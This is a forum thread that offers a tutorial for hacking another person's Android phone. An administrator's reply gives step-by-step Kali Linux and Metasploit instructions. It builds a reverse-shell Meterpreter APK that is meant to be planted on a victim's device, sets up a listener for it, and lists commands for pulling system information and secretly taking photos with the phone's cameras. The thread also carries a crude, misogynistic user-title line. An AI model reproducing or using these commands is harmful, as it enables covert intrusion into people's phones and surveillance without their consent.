Planning to Hack someone Andrio Phone? Well here is a good tutorial



Uses Kali Linux. Needs an App with the payload.

Seems interesting :D

Comments

  • bornkillerbornkiller Administrator In your girlfriends snatch
    Just another bloody android hack addition to this thread mayyyyte: ;)


    Victim Android Phone (version must be greater than 2.2)
    Kali Linux or backtrack 5 (Metasplot framework)
    VMware workstation
    Both the devices should be in same network, If not then we will use port forwarding.

    STEP -1 Firstly open the vmware work station.

    STEP -2 Switch or open on your kali/backtrack virtual machine.

    STEP -3 Open command Terminal!

    STEP -4 Before we start at first we have to make a bridge connection of our external ip address with the internal VMware IP address, for that do the following

    Click on VM on the file menu
    Go to removable devices
    Click on network adapter
    Click on settings

    STEP -5 Click on network adapter then under the network connection choose the Bridge radial button.

    STEP -6 Now Use the following commands

    Ifconfig (To check the internal ip address.
    Change the current directory with the desktop
    Use this command to make the apk file which we have to upload later on, on the victim’s mobile phone.
    msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 R > androhack.apk
    Open msfconsle
    Enter below command
    Use exploit/multi/handler
    Set Payload
    Set payload android/meterpreter/reverse_tcp
    Show options to see the LHOST and LPORT
    Set Lport to 192.168.1.7 which is I.P address of my Virtual machine which I got by typing the IFCONFIG command, here you have to write your i.p address,
    Set LPORT to 4444 which is our listening port.
    Type exploit (To connect with the Victim’s mobile)
    Type help (to see all the command which you can execute on victim’s
    mobile)
    Type sysinfo (To check the system information of the victim’s mobile)
    Type wecam_snap – I 2 (To take the front cam shot)
    Type wecam_snap – I 1 (To take the rear cam shot)

Sign In or Register to comment.